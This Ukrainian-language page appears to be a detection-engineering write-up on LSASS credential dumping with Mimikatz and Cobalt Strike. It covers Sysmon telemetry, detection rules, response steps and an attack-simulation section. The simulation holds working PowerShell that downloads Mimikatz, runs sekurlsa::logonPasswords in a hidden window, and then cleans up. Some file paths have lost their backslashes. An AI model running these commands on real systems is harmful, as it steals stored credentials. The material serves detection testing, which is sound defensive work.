Стежити
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
У статті описується, як зловмисники витягують облікові дані, отримуючи доступ до процесу LSASS за допомогою інструментів, таких як Mimikatz і Cobalt Strike. Розглянуто типові виклики Windows API, DLL та права доступу, що залучені у дампінгу пам’яті LSASS. Автори діляться оновленими запитами для виявлення в Sysmon та інших платформах EDR з акцентом на зміцнення покриття виявлення дампінгу облікових даних.
Розслідування
Команда Splunk з дослідження загроз емулювала доступ до LSASS, використовуючи Atomic Red Team, Mimikatz, Invoke-Mimikatz та Cobalt Strike. Вони отримали телеметрію Sysmon, яка демонструє завантаження DLL (dbgcore.dll, dbghelp.dll, ntdll.dll) та характерні значення GrantedAccess. Цей набір даних був потім використаний для налаштування запитів на виявлення, які корелюють інформацію CallTrace з конкретними правами доступу.
Пом’якшення
Налаштуйте політики Sysmon або EDR для логування подій ProcessAccess щодо lsass.exe, застосовуючи фільтри для відомих DLL та відповідних прав доступу, водночас виключаючи довірені системні процеси. Використовуйте надані запити для створення сповіщень про підозрілі моделі доступу до LSASS. Постійно переглядайте і уточнюйте ці правила, оскільки з’являються нові інструменти та техніки.
Відповідь
Коли виявлення спрацьовує, підтвердьте початковий процес, пов’язаний з ним контекст користувача та DLL, залучені в доступ до LSASS. Ізолюйте уражену кінцеву точку, захопіть пам’ять для глибшого форензичного аналізу та оцініть докази викрадення облікових даних. Дослідіть дерево процесів, щоб відрізнити законні адміністративні утиліти від активності, яка свідчить про нападника.
Потік атаки
Ми все ще оновлюємо цю частину. Підпишіться, щоб отримати повідомлення
Повідомити менеВиявлення
HackTool – Загальний доступ до процесів
Переглянути
Підозріле завантаження Dbgcore/Dbghelp DLL з незвичного місця
Переглянути
Підозрілий доступ до процесу LSASS з Dbgcore/Dbghelp DLL
Переглянути
Виявлення LSASS Credential Dumping через Process Access [Windows Sysmon]
Переглянути
Виконання симуляції
Передумова: Перевірка телеметрії та базового рівня повинна пройти успішно.
Причини: Цей розділ детально описує точне виконання техніки противника (TTP), призначеної для спрацьовування правила виявлення. Команди та наратив ПОВИННІ безпосередньо відображати ідентифіковані TTP та спрямовані на генерацію очікуваної телеметрії, відображеної логікою виявлення.
-
Опис атаки та команди:
Нападник отримав права локального адміністратора на хості жертви і хоче зібрати облікові дані для горизонтального руху. Вони копіюють інструмент з відкритим кодом Mimikatz на комп’ютер, підвищують привілеї процесу до DEBUG і викликають модульsekurlsa::logonPasswords, який зчитує пам’ять LSASS через виклики нативного API, що проходять черезntdll.dll. Sysmon фіксує це як подію ProcessAccess з кількома високопривілейованими прапорамиGrantedAccess(наприклад,0x0010,0x1400,0x1fffff). Нападник запускає інструмент із прихованої сесії PowerShell, щоб уникнути візуального відображення.# 1. Вивантажте Mimikatz в %TEMP% $mkPath = "$env:TEMPmimikatz.exe" Invoke-WebRequest -Uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0/mimikatz_trunk.zip" -OutFile "$env:TEMPmk.zip" Expand-Archive -Path "$env:TEMPmk.zip" -DestinationPath $env:TEMP -Force Move-Item -Path "$env:TEMPmimikatzx64mimikatz.exe" -Destination $mkPath -Force # 2. Виконайте Mimikatz з командами для дампінгу облікових даних Start-Process -FilePath $mkPath -ArgumentList 'privilege::debug sekurlsa::logonPasswords exit' -WindowStyle Hidden -Wait -
Скрипт регресійного тесту:
# ---------------------------------------------------------------------- # Симуляція дампу облікових даних LSASS – тригери правила Sigma #4e0789a0… # ---------------------------------------------------------------------- # Вивантажте Mimikatz (якщо ще не присутній) $mkPath = "$env:TEMPmimikatz.exe" if (-Not (Test-Path $mkPath)) { $zip = "$env:TEMPmk.zip" Invoke-WebRequest -Uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0/mimikatz_trunk.zip" -OutFile $zip Expand-Archive -Path $zip -DestinationPath $env:TEMP -Force Move-Item -Path "$env:TEMPmimikatzx64mimikatz.exe" -Destination $mkPath -Force Remove-Item $zip -Force } # Запустіть Mimikatz для дампу облікових даних LSASS $args = 'privilege::debug sekurlsa::logonPasswords exit' Write-Host "[+] Виконання Mimikatz для дампу LSASS..." Start-Process -FilePath $mkPath -ArgumentList $args -WindowStyle Hidden -Wait Write-Host "[+] Виконання Mimikatz завершено." # ---------------------------------------------------------------------- -
Команди очищення:
# Видаліть бінарний файл Mimikatz та будь-які залишкові файли $mkPath = "$env:TEMPmimikatz.exe" if (Test-Path $mkPath) { Remove-Item $mkPath -Force } $folder = "$env:TEMPmimikatz" if (Test-Path $folder) { Remove-Item $folder -Recurse -Force } Write-Host "Очищення завершено."